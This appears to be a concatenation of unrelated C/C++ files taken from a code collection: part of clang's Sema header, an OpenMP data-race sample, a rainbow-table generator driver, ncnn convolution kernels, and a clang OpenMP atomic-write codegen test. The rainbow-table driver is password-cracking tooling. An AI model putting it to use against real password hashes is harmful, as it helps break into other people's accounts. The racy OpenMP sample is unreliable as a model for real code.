Actions.PushExpressionEvaluationContext(NewContext, LambdaContextDecl,
ExprContext);
}
EnterExpressionEvaluationContext(
Sema &Actions, Sema::ExpressionEvaluationContext NewContext,
Sema::ReuseLambdaContextDecl_t,
Sema::ExpressionEvaluationContextRecord::ExpressionKind ExprContext =
Sema::ExpressionEvaluationContextRecord::EK_Other)
: Actions(Actions) {
Actions.PushExpressionEvaluationContext(
NewContext, Sema::ReuseLambdaContextDecl, ExprContext);
}
enum InitListTag { InitList };
EnterExpressionEvaluationContext(Sema &Actions, InitListTag,
bool ShouldEnter = true)
: Actions(Actions), Entered(false) {
// In C++11 onwards, narrowing checks are performed on the contents of
// braced-init-lists, even when they occur within unevaluated operands.
// Therefore we still need to instantiate constexpr functions used in such
// a context.
if (ShouldEnter && Actions.isUnevaluatedContext() &&
Actions.getLangOpts().CPlusPlus11) {
Actions.PushExpressionEvaluationContext(
Sema::ExpressionEvaluationContext::UnevaluatedList);
Entered = true;
}
}
~EnterExpressionEvaluationContext() {
if (Entered)
Actions.PopExpressionEvaluationContext();
}
};
DeductionFailureInfo
MakeDeductionFailureInfo(ASTContext &Context, Sema::TemplateDeductionResult TDK,
sema::TemplateDeductionInfo &Info);
/// Contains a late templated function.
/// Will be parsed at the end of the translation unit, used by Sema & Parser.
struct LateParsedTemplate {
CachedTokens Toks;
/// The template function declaration to be late parsed.
Decl *D;
};
} // end namespace clang
namespace llvm {
// Hash a FunctionDeclAndLoc by looking at both its FunctionDecl and its
// SourceLocation.
template <> struct DenseMapInfo<clang::Sema::FunctionDeclAndLoc> {
using FunctionDeclAndLoc = clang::Sema::FunctionDeclAndLoc;
using FDBaseInfo = DenseMapInfo<clang::CanonicalDeclPtr<clang::FunctionDecl>>;
static FunctionDeclAndLoc getEmptyKey() {
return {FDBaseInfo::getEmptyKey(), clang::SourceLocation()};
}
static FunctionDeclAndLoc getTombstoneKey() {
return {FDBaseInfo::getTombstoneKey(), clang::SourceLocation()};
}
static unsigned getHashValue(const FunctionDeclAndLoc &FDL) {
return hash_combine(FDBaseInfo::getHashValue(FDL.FD),
FDL.Loc.getRawEncoding());
}
static bool isEqual(const FunctionDeclAndLoc &LHS,
const FunctionDeclAndLoc &RHS) {
return LHS.FD == RHS.FD && LHS.Loc == RHS.Loc;
}
};
} // namespace llvm
#endif
|
cs-enforcer.c | int main() {
int X;
#pragma omp parallel
{
int i;
#pragma omp sections
{
#pragma omp section
X = X + 1;
#pragma omp section
X = X - 1;
#pragma omp section
for (i = 0; i < 10; i++)
X++;
}
}
}
|
mainRT.c | #include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <omp.h>
#include "blake.h"
#include "createRT.h"
int main(int argc, char **argv) {
size_t rainbow_size = (argc == 2) ? atoi(argv[1]) : RAINBOW_SIZE;
rainbow_size = (rainbow_size > 0) ? rainbow_size : RAINBOW_SIZE;
srand((unsigned) time(NULL));
size_t table_id;
size_t num_of_tables = NUM_OF_TABLES;
size_t chain_len = CHAIN_LEN;
/* Parallel creation of NUM_OF_TABLES rainbow tables */
#pragma omp parallel for
for (table_id = 0 ; table_id < num_of_tables ; table_id++) {
printf("creating %zu of %zu\n", table_id, num_of_tables);
create_RT(rainbow_size, table_id, chain_len);
}
return EXIT_SUCCESS;
}
|
convolution_1x1_pack8to4_int8.h | // Tencent is pleased to support the open source community by making ncnn available.
//
// Copyright (C) 2022 THL A29 Limited, a Tencent company. All rights reserved.
//
// Licensed under the BSD 3-Clause License (the "License"); you may not use this file except
// in compliance with the License. You may obtain a copy of the License at
//
// https://opensource.org/licenses/BSD-3-Clause
//
// Unless required by applicable law or agreed to in writing, software distributed
// under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
// CONDITIONS OF ANY KIND, either express or implied. See the License for the
// specific language governing permissions and limitations under the License.
static void conv1x1s1_sgemm_pack8to4_int8_msa(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Option& opt)
{
int w = bottom_blob.w;
int h = bottom_blob.h;
const int size = w * h;
Mat bottom_im2col = bottom_blob;
bottom_im2col.w = size;
bottom_im2col.h = 1;
im2col_sgemm_pack8to4_int8_msa(bottom_im2col, top_blob, kernel, opt);
}
static void conv1x1s2_sgemm_pack8to4_int8_msa(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Option& opt)
{
int w = bottom_blob.w;
int channels = bottom_blob.c;
size_t elemsize = bottom_blob.elemsize;
int elempack = bottom_blob.elempack;
int outw = top_blob.w;
int outh = top_blob.h;
const int tailstep = w - 2 * outw + w;
Mat bottom_blob_shrinked;
bottom_blob_shrinked.create(outw, outh, channels, elemsize, elempack, opt.workspace_allocator);
#pragma omp parallel for num_threads(opt.num_threads)
for (int p = 0; p < channels; p++)
{
const int64_t* r0 = bottom_blob.channel(p);
int64_t* outptr = bottom_blob_shrinked.channel(p);
for (int i = 0; i < outh; i++)
{
int j = 0;
for (; j < outw; j++)
{
outptr[0] = r0[0];
r0 += 2;
outptr += 1;
}
r0 += tailstep;
}
}
conv1x1s1_sgemm_pack8to4_int8_msa(bottom_blob_shrinked, top_blob, kernel, opt);
}
|
atomic_write_codegen.c | // RUN: %clang_cc1 -no-opaque-pointers -verify -triple x86_64-apple-darwin10 -target-cpu core2 -fopenmp -x c -emit-llvm %s -o - | FileCheck %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp -x c -triple x86_64-apple-darwin10 -target-cpu core2 -emit-pch -o %t %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp -x c -triple x86_64-apple-darwin10 -target-cpu core2 -include-pch %t -verify %s -emit-llvm -o - | FileCheck %s
// RUN: %clang_cc1 -no-opaque-pointers -verify -triple x86_64-apple-darwin10 -target-cpu core2 -fopenmp-simd -x c -emit-llvm %s -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-simd -x c -triple x86_64-apple-darwin10 -target-cpu core2 -emit-pch -o %t %s
// RUN: %clang_cc1 -no-opaque-pointers -fopenmp-simd -x c -triple x86_64-apple-darwin10 -target-cpu core2 -include-pch %t -verify %s -emit-llvm -o - | FileCheck --check-prefix SIMD-ONLY0 %s
// SIMD-ONLY0-NOT: {{__kmpc|__tgt}}
// expected-no-diagnostics
// REQUIRES: x86-registered-target
#ifndef HEADER
#define HEADER
_Bool bv, bx;
char cv, cx;
unsigned char ucv, ucx;
short sv, sx;
unsigned short usv, usx;
int iv, ix;
unsigned int uiv, uix;
long lv, lx;
unsigned long ulv, ulx;
long long llv, llx;
unsigned long long ullv, ullx;
float fv, fx;
double dv, dx;
long double ldv, ldx;
_Complex int civ, cix;
_Complex float cfv, cfx;
_Complex double cdv, cdx;
typedef int int4 __attribute__((__vector_size__(16)));
int4 int4x;
struct BitFields {
int : 32;
int a : 31;
} bfx;
struct BitFields_packed {
int : 32;
int a : 31;
} __attribute__ ((__packed__)) bfx_packed;
struct BitFields2 {
int : 31;
int a : 1;
} bfx2;
struct BitFields2_packed {
int : 31;
int a : 1;
} __attribute__ ((__packed__)) bfx2_packed;
struct BitFields3 {
int : 11;
int a : 14;
} bfx3;
struct BitFields3_packed {
int : 11;
int a : 14;
} __attribute__ ((__packed__)) bfx3_packed;
struct BitFields4 {
short : 16;
int a: 1;
long b : 7;
} bfx4;
struct BitFields4_packed {
short : 16;
int a: 1;
long b : 7;
} __attribute__ ((__packed__)) bfx4_packed;
typedef float float2 __attribute__((ext_vector_type(2)));
float2 float2x;
// Register "0" is currently an invalid register for global register variables.
// Use "esp" instead of "0".
// register int rix __asm__("0");
register int rix __asm__("esp");
int main(void) {
// CHECK: store atomic i32 1, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @civ, i32 0, i32 1) monotonic, align 4
#pragma omp atomic write
__imag(civ) = 1;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = bv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} release, align 1
#pragma omp atomic write release
cx = cv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
ucx = ucv;
// CHECK: load i16, i16*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
sx = sv;
// CHECK: load i16, i16*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
usx = usv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
ix = iv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
uix = uiv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
lx = lv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = ulv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
llx = llv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ullx = ullv;
// CHECK: load float, float*
// CHECK: bitcast float {{.*}} to i32
// CHECK: store atomic i32 {{.*}}, i32* bitcast (float* {{.*}} monotonic, align 4
#pragma omp atomic write
fx = fv;
// CHECK: load double, double*
// CHECK: bitcast double {{.*}} to i64
// CHECK: store atomic i64 {{.*}}, i64* bitcast (double* {{.*}} monotonic, align 8
#pragma omp atomic write
dx = dv;
// CHECK: [[LD:%.+]] = load x86_fp80, x86_fp80*
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[LDTEMP:%.*]] to i8*
// CHECK: call void @llvm.memset.p0i8.i64(i8* align 16 [[BITCAST]], i8 0, i64 16, i1 false)
// CHECK: store x86_fp80 [[LD]], x86_fp80* [[LDTEMP]]
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[LDTEMP:%.*]] to i128*
// CHECK: [[LD:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: store atomic i128 [[LD]], i128* bitcast (x86_fp80* {{.*}} monotonic, align 16
#pragma omp atomic write
ldx = ldv;
// CHECK: [[REAL_VAL:%.+]] = load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[REAL_VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 [[IMG_VAL]], i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = civ;
// CHECK: [[REAL_VAL:%.+]] = load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { float, float }, { float, float }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { float, float }, { float, float }* [[TEMP]], i32 0, i32 1
// CHECK: store float [[REAL_VAL]], float* [[TEMP_REAL_REF]]
// CHECK: store float [[IMG_VAL]], float* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { float, float }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ float, float }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cfx = cfv;
// CHECK: [[REAL_VAL:%.+]] = load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.*}}, i32 0, i32 0)
// CHECK: [[IMG_VAL:%.+]] = load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.*}}, i32 0, i32 1)
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { double, double }, { double, double }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { double, double }, { double, double }* [[TEMP]], i32 0, i32 1
// CHECK: store double [[REAL_VAL]], double* [[TEMP_REAL_REF]]
// CHECK: store double [[IMG_VAL]], double* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { double, double }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 16, i8* noundef bitcast ({ double, double }* @{{.*}} to i8*), i8* noundef [[BITCAST]], i32 noundef 5)
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic seq_cst write
cdx = cdv;
// CHECK: load i8, i8*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = bv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = cv;
// CHECK: load i8, i8*
// CHECK: store atomic i8 {{.*}} seq_cst, align 1
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic write, seq_cst
cx = ucv;
// CHECK: load i16, i16*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
ulx = sv;
// CHECK: load i16, i16*
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
lx = usv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} seq_cst, align 4
// CHECK: call{{.*}} @__kmpc_flush(
#pragma omp atomic seq_cst, write
uix = iv;
// CHECK: load i32, i32*
// CHECK: store atomic i32 {{.*}} monotonic, align 4
#pragma omp atomic write
ix = uiv;
// CHECK: load i64, i64*
// CHECK: [[VAL:%.+]] = trunc i64 %{{.*}} to i32
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 0, i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.+}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = lv;
// CHECK: load i64, i64*
// CHECK: store atomic i32 %{{.+}}, i32* bitcast (float* {{.*}} monotonic, align 4
#pragma omp atomic write
fx = ulv;
// CHECK: load i64, i64*
// CHECK: store atomic i64 %{{.+}}, i64* bitcast (double* {{.*}} monotonic, align 8
#pragma omp atomic write
dx = llv;
// CHECK: load i64, i64*
// CHECK: [[VAL:%.+]] = uitofp i64 %{{.+}} to x86_fp80
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[TEMP:%.+]] to i8*
// CHECK: call void @llvm.memset.p0i8.i64(i8* align 16 [[BITCAST]], i8 0, i64 16, i1 false)
// CHECK: store x86_fp80 [[VAL]], x86_fp80* [[TEMP]]
// CHECK: [[BITCAST:%.+]] = bitcast x86_fp80* [[TEMP]] to i128*
// CHECK: [[VAL:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: store atomic i128 [[VAL]], i128* bitcast (x86_fp80* {{.*}} monotonic, align 16
#pragma omp atomic write
ldx = ullv;
// CHECK: load float, float*
// CHECK: [[VAL:%.+]] = fptosi float %{{.*}} to i32
// CHECK: [[TEMP_REAL_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP:%.+]], i32 0, i32 0
// CHECK: [[TEMP_IMG_REF:%.+]] = getelementptr inbounds { i32, i32 }, { i32, i32 }* [[TEMP]], i32 0, i32 1
// CHECK: store i32 [[VAL]], i32* [[TEMP_REAL_REF]]
// CHECK: store i32 0, i32* [[TEMP_IMG_REF]]
// CHECK: [[BITCAST:%.+]] = bitcast { i32, i32 }* [[TEMP]] to i8*
// CHECK: call void @__atomic_store(i64 noundef 8, i8* noundef bitcast ({ i32, i32 }* @{{.+}} to i8*), i8* noundef [[BITCAST]], i32 noundef 0)
#pragma omp atomic write
cix = fv;
// CHECK: load double, double*
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
sx = dv;
// CHECK: load x86_fp80, x86_fp80*
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = ldv;
// CHECK: load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.+}}, i32 0, i32 0)
// CHECK: load i32, i32* getelementptr inbounds ({ i32, i32 }, { i32, i32 }* @{{.+}}, i32 0, i32 1)
// CHECK: icmp ne i32 %{{.+}}, 0
// CHECK: icmp ne i32 %{{.+}}, 0
// CHECK: or i1
// CHECK: store atomic i8 {{.*}} monotonic, align 1
#pragma omp atomic write
bx = civ;
// CHECK: load float, float* getelementptr inbounds ({ float, float }, { float, float }* @{{.*}}, i32 0, i32 0)
// CHECK: store atomic i16 {{.*}} monotonic, align 2
#pragma omp atomic write
usx = cfv;
// CHECK: load double, double* getelementptr inbounds ({ double, double }, { double, double }* @{{.+}}, i32 0, i32 0)
// CHECK: store atomic i64 {{.*}} monotonic, align 8
#pragma omp atomic write
llx = cdv;
// CHECK-DAG: [[IDX:%.+]] = load i16, i16* @{{.+}}
// CHECK-DAG: load i8, i8*
// CHECK-DAG: [[VEC_ITEM_VAL:%.+]] = zext i1 %{{.+}} to i32
// CHECK: [[I128VAL:%.+]] = load atomic i128, i128* bitcast (<4 x i32>* [[DEST:@.+]] to i128*) monotonic, align 16
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_I128:%.+]] = phi i128 [ [[I128VAL]], %{{.+}} ], [ [[FAILED_I128_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BITCAST:%.+]] = bitcast <4 x i32>* [[LDTEMP:%.+]] to i128*
// CHECK: store i128 [[OLD_I128]], i128* [[BITCAST]],
// CHECK: [[VEC_VAL:%.+]] = load <4 x i32>, <4 x i32>* [[LDTEMP]]
// CHECK: [[NEW_VEC_VAL:%.+]] = insertelement <4 x i32> [[VEC_VAL]], i32 [[VEC_ITEM_VAL]], i16 [[IDX]]
// CHECK: store <4 x i32> [[NEW_VEC_VAL]], <4 x i32>* [[LDTEMP]]
// CHECK: [[NEW_I128:%.+]] = load i128, i128* [[BITCAST]]
// CHECK: [[RES:%.+]] = cmpxchg i128* bitcast (<4 x i32>* [[DEST]] to i128*), i128 [[OLD_I128]], i128 [[NEW_I128]] monotonic monotonic, align 16
// CHECK: [[FAILED_I128_OLD_VAL:%.+]] = extractvalue { i128, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i128, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
int4x[sv] = bv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* bitcast (i8* getelementptr (i8, i8* bitcast (%struct.BitFields* @{{.+}} to i8*), i64 4) to i32*) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_VALUE:%.+]] = and i32 [[NEW_VAL]], 2147483647
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, -2147483648
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* bitcast (i8* getelementptr (i8, i8* bitcast (%struct.BitFields* @{{.+}} to i8*), i64 4) to i32*), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[BITCAST:%.+]] = bitcast i32* [[LDTEMP:%.+]] to i8*
// CHECK: call void @__atomic_load(i64 noundef 4, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields_packed* @{{.+}} to i8*), i64 4), i8* noundef [[BITCAST]], i32 noundef 0)
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]],
// CHECK: store i32 [[OLD_BF_VALUE]], i32* [[LDTEMP1:%.+]],
// CHECK: [[OLD_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP1]],
// CHECK: [[BF_VALUE:%.+]] = and i32 [[NEW_VAL]], 2147483647
// CHECK: [[BF_CLEAR:%.+]] = and i32 [[OLD_BF_VALUE]], -2147483648
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP1]]
// CHECK: [[BITCAST_TEMP_OLD_BF_ADDR:%.+]] = bitcast i32* [[LDTEMP]] to i8*
// CHECK: [[BITCAST_TEMP_NEW_BF_ADDR:%.+]] = bitcast i32* [[LDTEMP1]] to i8*
// CHECK: [[FAIL_SUCCESS:%.+]] = call zeroext i1 @__atomic_compare_exchange(i64 noundef 4, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields_packed* @{{.+}} to i8*), i64 4), i8* noundef [[BITCAST_TEMP_OLD_BF_ADDR]], i8* noundef [[BITCAST_TEMP_NEW_BF_ADDR]], i32 noundef 0, i32 noundef 0)
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* getelementptr inbounds (%struct.BitFields2, %struct.BitFields2* @{{.+}}, i32 0, i32 0) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i32 [[NEW_VAL]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i32 [[BF_AND]], 31
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, 2147483647
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* getelementptr inbounds (%struct.BitFields2, %struct.BitFields2* @{{.+}}, i32 0, i32 0), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx2.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i8, i8* getelementptr (i8, i8* bitcast (%struct.BitFields2_packed* @{{.+}} to i8*), i64 3) monotonic, align 1
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i8 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i8
// CHECK: [[BF_AND:%.+]] = and i8 [[TRUNC]], 1
// CHECK: [[BF_VALUE:%.+]] = shl i8 [[BF_AND]], 7
// CHECK: [[BF_CLEAR:%.+]] = and i8 %{{.+}}, 127
// CHECK: or i8 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i8 %{{.+}}, i8* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i8, i8* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i8* getelementptr (i8, i8* bitcast (%struct.BitFields2_packed* @{{.+}} to i8*), i64 3), i8 [[OLD_BF_VALUE]], i8 [[NEW_BF_VALUE]] monotonic monotonic, align 1
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i8, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i8, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx2_packed.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[PREV_VALUE:%.+]] = load atomic i32, i32* getelementptr inbounds (%struct.BitFields3, %struct.BitFields3* @{{.+}}, i32 0, i32 0) monotonic, align 4
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_BF_VALUE:%.+]] = phi i32 [ [[PREV_VALUE]], %[[EXIT]] ], [ [[FAILED_OLD_VAL:%.+]], %[[CONT]] ]
// CHECK: [[BF_AND:%.+]] = and i32 [[NEW_VAL]], 16383
// CHECK: [[BF_VALUE:%.+]] = shl i32 [[BF_AND]], 11
// CHECK: [[BF_CLEAR:%.+]] = and i32 %{{.+}}, -33552385
// CHECK: or i32 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i32 %{{.+}}, i32* [[LDTEMP:%.+]]
// CHECK: [[NEW_BF_VALUE:%.+]] = load i32, i32* [[LDTEMP]]
// CHECK: [[RES:%.+]] = cmpxchg i32* getelementptr inbounds (%struct.BitFields3, %struct.BitFields3* @{{.+}}, i32 0, i32 0), i32 [[OLD_BF_VALUE]], i32 [[NEW_BF_VALUE]] monotonic monotonic, align 4
// CHECK: [[FAILED_OLD_VAL]] = extractvalue { i32, i1 } [[RES]], 0
// CHECK: [[FAIL_SUCCESS:%.+]] = extractvalue { i32, i1 } [[RES]], 1
// CHECK: br i1 [[FAIL_SUCCESS]], label %[[EXIT:.+]], label %[[CONT]]
// CHECK: [[EXIT]]
#pragma omp atomic write
bfx3.a = ldv;
// CHECK: load x86_fp80, x86_fp80* @{{.+}}
// CHECK: [[NEW_VAL:%.+]] = fptosi x86_fp80 %{{.+}} to i32
// CHECK: [[LDTEMP:%.+]] = bitcast i32* %{{.+}} to i24*
// CHECK: [[BITCAST:%.+]] = bitcast i24* %{{.+}} to i8*
// CHECK: call void @__atomic_load(i64 noundef 3, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields3_packed* @{{.+}} to i8*), i64 1), i8* noundef [[BITCAST]], i32 noundef 0)
// CHECK: br label %[[CONT:.+]]
// CHECK: [[CONT]]
// CHECK: [[OLD_VAL:%.+]] = load i24, i24* %{{.+}},
// CHECK: store i24 [[OLD_VAL]], i24* [[TEMP:%.+]],
// CHECK: [[TRUNC:%.+]] = trunc i32 [[NEW_VAL]] to i24
// CHECK: [[BF_AND:%.+]] = and i24 [[TRUNC]], 16383
// CHECK: [[BF_VALUE:%.+]] = shl i24 [[BF_AND]], 3
// CHECK: [[BF_CLEAR:%.+]] = and i24 %{{.+}}, -131065
// CHECK: or i24 [[BF_CLEAR]], [[BF_VALUE]]
// CHECK: store i24 %{{.+}}, i24* [[TEMP]]
// CHECK: [[BITCAST_TEMP_OLD_BF_ADDR:%.+]] = bitcast i24* [[LDTEMP]] to i8*
// CHECK: [[BITCAST_TEMP_NEW_BF_ADDR:%.+]] = bitcast i24* [[TEMP]] to i8*
// CHECK: [[FAIL_SUCCESS:%.+]] = call zeroext i1 @__atomic_compare_exchange(i64 noundef 3, i8* noundef getelementptr (i8, i8* bitcast (%struct.BitFields3_packed* @{{.+}} to i8*), i64 1), i8* noundef [[BITCAST_TEMP_OLD_BF_ADDR]], i8* noundef [[BITCAST_TEMP_NEW_BF_ADDR]], i32 noundef 0, i32 noundef 0)
